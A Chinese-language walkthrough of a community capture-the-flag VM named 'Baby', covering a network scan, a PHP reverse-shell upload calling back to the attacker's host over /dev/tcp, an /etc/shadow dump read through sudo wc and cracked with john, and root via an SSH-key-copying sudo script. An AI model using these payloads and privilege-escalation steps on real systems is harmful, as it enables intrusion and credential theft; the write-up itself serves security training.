群友靶机Baby

本期推荐

我们的歌 王力宏

正片开始

信息收集一手

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l                            
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:3e:06:8c       (Unknown)
192.168.56.107  08:00:27:3e:51:df       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.893 seconds (135.24 hosts/sec). 3 responded
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -p- 192.168.56.107
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-22 00:40 +08
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 00:40 (0:00:06 remaining)
Nmap scan report for 192.168.56.107
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:3E:51:DF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds
                                                              

访问web服务，发现可以上传文件

这个web的项目在GitHub上是开源的，后端是用php写的，要打穿估计也是使用php文件

我尝试传文件，但是发现一直传不上去，这就有点搞了
通过GitHub上开源的源代码(丢给ds爷爷分析一手，得到传文件的方法)
使用curl方法传文件

关于php文件就是经典的反弹shell文件

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/7777 0>&1'"); ?>

上传+访问

┌──(root㉿kali)-[/home/kali]
└─# curl -b cookies.txt \
  -F "file_data=@v.php" \
  -F "file=" \
  -F "xsrf=da5cca18d1a1a4632136fd90fd6c74b6" \
  -F "do=upload" \
  "http://192.168.56.107"
array(3) {
  ["file"]=>
  string(0) ""
  ["xsrf"]=>
  string(32) "da5cca18d1a1a4632136fd90fd6c74b6"
  ["do"]=>
  string(6) "upload"
}
array(1) {
  ["file_data"]=>
  array(6) {
    ["name"]=>
    string(5) "v.php"
    ["full_path"]=>
    string(5) "v.php"
    ["type"]=>
    string(24) "application/octet-stream"
    ["tmp_name"]=>
    string(14) "/tmp/phpSSnQX8"
    ["error"]=>
    int(0)
    ["size"]=>
    int(78)
  }
}
string(14) "/tmp/phpSSnQX8"
bool(true)
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# nc -lnvp 7777
listening on [any] 7777 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.107] 50648
bash: cannot set terminal process group (424): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Baby:/var/www/html$ 

弹到shell了

www-data@Baby:/var/www/html$ ls
ls
index.php
shell.php
v.php
w.php

除了一个index.php以外，其余都是我痛苦的尝试哎呀呀

home目录下发现猫腻

www-data@Baby:/home$ ls
ls
aaa
bbb
ccc
www-data@Baby:/home$ cat aaa
cat aaa
cat: aaa: Permission denied

sudo -l检查也没发现东西

进/ect/passwd

www-data@Baby:/etc$ cat passwd
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
aaa:x:1001:1001:pa**wd -> root:/home/aaa:/bin/bash
bbb:x:1002:1002:,,,:/home/bbb:/bin/bash
ccc:x:1003:1003:,,,:/home/ccc:/bin/bash

发现用户aaa的密码是root

www-data@Baby:/etc$ su aaa  
su aaa
Password: root
id
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)

得到用户aaa

sudo -l再次检查

sudo -l
Matching Defaults entries for aaa on Baby:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User aaa may run the following commands on Baby:
    (ALL) NOPASSWD: /usr/bin/wc

wc提权?或许可以切到root!
众所周知的/etc/shadow中放的是root相关内容，我可以利用wc读取

'root:$6$ePAhWE/j6QGfTWM3$Dn1vzbctoIv32MS89goS8Glk1h4W7ftIczomZ20dSGxrQq5ilIQyy2Y4wyQ4uw6F4O0IpgBfe0i8vE3/LQzLi/:20373:0:99999:7:::'$'\n''daemon:*:20166:0:99999:7:::'$'\n''bin:*:20166:0:99999:7:::'$'\n''sys:*:20166:0:99999:7:::'$'\n''sync:*:20166:0:99999:7:::'$'\n''games:*:20166:0:99999:7:::'$'\n''man:*:20166:0:99999:7:::'$'\n''lp:*:20166:0:99999:7:::'$'\n''mail:*:20166:0:99999:7:::'$'\n''news:*:20166:0:99999:7:::'$'\n''uucp:*:20166:0:99999:7:::'$'\n''proxy:*:20166:0:99999:7:::'$'\n''www-data:*:20166:0:99999:7:::'$'\n''backup:*:20166:0:99999:7:::'$'\n''list:*:20166:0:99999:7:::'$'\n''irc:*:20166:0:99999:7:::'$'\n''gnats:*:20166:0:99999:7:::'$'\n''nobody:*:20166:0:99999:7:::'$'\n''_apt:*:20166:0:99999:7:::'$'\n''systemd-timesync:*:20166:0:99999:7:::'$'\n''systemd-network:*:20166:0:99999:7:::'$'\n''systemd-resolve:*:20166:0:99999:7:::'$'\n''systemd-coredump:!!:20166::::::'$'\n''messagebus:*:20166:0:99999:7:::'$'\n''sshd:*:20166:0:99999:7:::'$'\n''welcome:$6$Tcl1PdHt0sKyxCmX$0BRc1xwfh2ZcKWqdX.d9QZpZfoUojWKv76BIILLM6ZbQZ9w9e8hg23fl1yFQ5heujThjKtejlddXoTmj1R2230:20190:0:99999:7:::'$'\n''aaa:$6$T0eyyrFo5fXjPVRB$w1WeM8bwmrlOoCI9Hl6ZK5OD5GufCEu.JTvq3uR7t.rKGdKZWlsbigec.RMLuXHxKMihPiIPYrBFwPrgPgpzR0:20373:0:99999:7:::'$'\n''bbb:$6$rwAiZOTGKLpC1Yo6$yeTo5f5THCRygCQcLqICyJh8UC.7eNRxFI0.Dmp995qjU/SuvJhFBHe5hD8DUj.CW/TlX5nrtYgZZox5KuOxS1:20373:0:99999:7:::'$'\n''ccc:$6$6.RbUGiv0omWNBhq$RuvFC1eOMv9L5.lX8iQtE3ACNhdUUAa/9bZnZnd01lntWURW2/Vzjl/xtQwoGOzyZ12vbBPV/IICzcTolwrwn1:20373:0:99999:7:::'$'\n': No such file or directory

丢给AI处理之后利用john进行爆破即可
参考文献https://www.cnblogs.com/hgschool/p/17070890.html

得到aaa，bbb，ccc三个用户的密码都是root

在bbb目录下得到userflag

去ccc一探究竟

sudo -l
Matching Defaults entries for ccc on Baby:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ccc may run the following commands on Baby:
    (ALL) NOPASSWD: /opt/ccc.sh

有一个ccc.sh，那利用aaa的权限来读取一下

sudo wc --files0-from "/opt/ccc.sh"
wc: '#!/bin/bash'$'\n\n''cp /home/ccc/.ssh/id_rsa.pub /root/.ssh/authorized_keys'$'\n': No such file or directory

看不懂，丢给ds爷爷分析一下

看起来 /opt/ccc.sh 是一个后门脚本，它的作用是：
复制SSH公钥：将用户 ccc 的SSH公钥复制到root用户的授权密钥文件中
建立SSH无密码登录：这样用户 ccc 就可以无需密码通过SSH登录root账户

666还有这好事，那我把我kali本地的ssh公钥放到ccc目录下，然后我kali本机不就可以直接登录上去了

但是我看到了另外一种做法，很明显更明智，直接把ccc的公钥生成了，然后sudo运行ccc.sh，就可以无痛登录root了

ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ccc/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/ccc/.ssh/id_rsa
Your public key has been saved in /home/ccc/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:mG+KjI7tmE9gWXWhw0hg70wq3kRMgwGpstdRjhkOsyU ccc@Baby
The key's randomart image is:
+---[RSA 3072]----+
|o=++ . o.        |
|o.E B +          |
|.  # X           |
|o X = oo         |
|+= = .o S        |
|=.+ .  .         |
| o..    o        |
| * o . o         |
|++* o .          |
+----[SHA256]-----+
sudo /opt/ccc.sh 
ssh root@localhost 
Pseudo-terminal will not be allocated because stdin is not a terminal.
Host key verification failed.

发现弹shell的伪终端无法ssh连接，用script化为稳定终端

script -qc /bin/bash /dev/null
ccc@Baby:~/.ssh$ sudo /opt/ccc.sh
sudo /opt/ccc.sh
ccc@Baby:~/.ssh$ ssh root@localhost
ssh root@localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Linux Baby 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct 12 03:42:24 2025 from 192.168.3.94
root@Baby:~# ls
ls
root.txt
root@Baby:~# cat root.txt
cat root.txt
flag{root-7ed9295c3bdb1aaf2b427b64942b40fb}
root@Baby:~# 

成功提权

晚安大家